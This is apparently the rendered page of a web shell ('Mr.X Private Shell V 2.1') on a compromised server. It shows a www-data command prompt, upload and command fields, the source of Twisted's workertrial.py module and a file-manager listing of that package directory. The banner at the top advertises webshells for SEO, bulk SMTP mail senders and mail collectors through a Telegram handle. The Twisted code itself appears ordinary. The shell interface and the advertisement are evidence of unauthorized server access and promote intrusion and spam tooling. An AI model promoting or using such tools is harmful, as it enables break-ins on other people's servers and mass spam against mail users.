__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# -*- test-case-name: twisted.trial._dist.test.test_workertrial -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Implementation of C{AMP} worker commands, and main executable entry point for
the workers.

@since: 12.3
"""

import errno
import os
import sys

from twisted.internet.protocol import FileWrapper
from twisted.python.log import startLoggingWithObserver, textFromEventDict
from twisted.trial._dist import _WORKER_AMP_STDIN, _WORKER_AMP_STDOUT
from twisted.trial._dist.options import WorkerOptions


class WorkerLogObserver:
    """
    A log observer that forwards every textual log event to a C{AMP}
    protocol.
    """

    def __init__(self, protocol):
        """
        Remember the protocol that log text will be sent through.

        @param protocol: a connected C{AMP} protocol instance.
        @type protocol: C{AMP}
        """
        self.protocol = protocol

    def emit(self, eventDict):
        """
        Render C{eventDict} as text and send it over the protocol as a
        C{managercommands.TestWrite} command.

        Events for which C{textFromEventDict} yields L{None} are dropped
        without contacting the protocol.

        @param eventDict: the log event to forward.
        """
        # Kept as a function-scope import, exactly as the module has always
        # done it; it is resolved on every call, before the event is rendered.
        from twisted.trial._dist import managercommands

        rendered = textFromEventDict(eventDict)
        if rendered is not None:
            self.protocol.callRemote(managercommands.TestWrite, out=rendered)


def main(_fdopen=os.fdopen):
    """
    Entry point of a worker process, run if __name__ == "__main__".

    Parses the worker options, connects a C{WorkerProtocol} to the file
    descriptors C{_WORKER_AMP_STDIN} and C{_WORKER_AMP_STDOUT}, routes log
    events through a L{WorkerLogObserver}, and then feeds the protocol the
    bytes read from the input descriptor until end of file.  If a tracer is
    configured on the options, its results are written out before returning.

    @param _fdopen: If specified, the function to use in place of C{os.fdopen}.
    @type _fdopen: C{callable}
    """
    options = WorkerOptions()
    options.parseOptions()

    # Function-scope import, performed only after the options are parsed.
    from twisted.trial._dist.worker import WorkerProtocol

    protocol = WorkerProtocol(options["force-gc"])

    ampInput = _fdopen(_WORKER_AMP_STDIN, "rb")
    ampOutput = _fdopen(_WORKER_AMP_STDOUT, "wb")
    protocol.makeConnection(FileWrapper(ampOutput))

    # Every log event is rendered and shipped through the protocol.
    startLoggingWithObserver(WorkerLogObserver(protocol).emit, False)

    while True:
        try:
            # NOTE(review): presumably read one byte at a time so the loop
            # never waits for more data than the peer has sent -- confirm
            # before widening the read size.
            chunk = ampInput.read(1)
        except OSError as err:
            # An interrupted read is simply retried; anything else is fatal.
            if err.args[0] != errno.EINTR:
                raise
            continue
        if chunk == b"":
            # End of file on the input descriptor: stop pumping.
            break
        protocol.dataReceived(chunk)
        # Push out whatever handling that byte produced.
        ampOutput.flush()
        sys.stdout.flush()
        sys.stderr.flush()

    if options.tracer:
        # Stop tracing before the collected results are written.
        sys.settrace(None)
        traceResults = options.tracer.results()
        traceResults.write_results(
            show_missing=True,
            summary=False,
            coverdir=options.coverdir().path,
        )


# Run the worker loop only when this module is executed as a script, not when
# it is imported.
if __name__ == "__main__":
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
test Folder 0755
__init__.py File 1.9 KB 0644
distreporter.py File 2.58 KB 0644
disttrial.py File 16.22 KB 0644
functional.py File 2.88 KB 0644
managercommands.py File 1.73 KB 0644
options.py File 737 B 0644
stream.py File 2.38 KB 0644
worker.py File 14.1 KB 0644
workercommands.py File 574 B 0644
workerreporter.py File 11.32 KB 0644
workertrial.py File 2.37 KB 0644
Filemanager